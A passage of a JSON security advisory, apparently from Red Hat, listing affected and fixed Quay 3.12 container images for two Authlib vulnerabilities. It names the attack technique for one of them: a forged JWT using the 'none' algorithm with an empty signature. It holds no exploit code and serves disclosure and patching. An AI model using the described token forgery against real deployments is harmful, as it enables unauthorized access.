"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "RHBZ#2448164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27962",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
}
],
"release_date": "2026-03-16T17:34:38.946000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
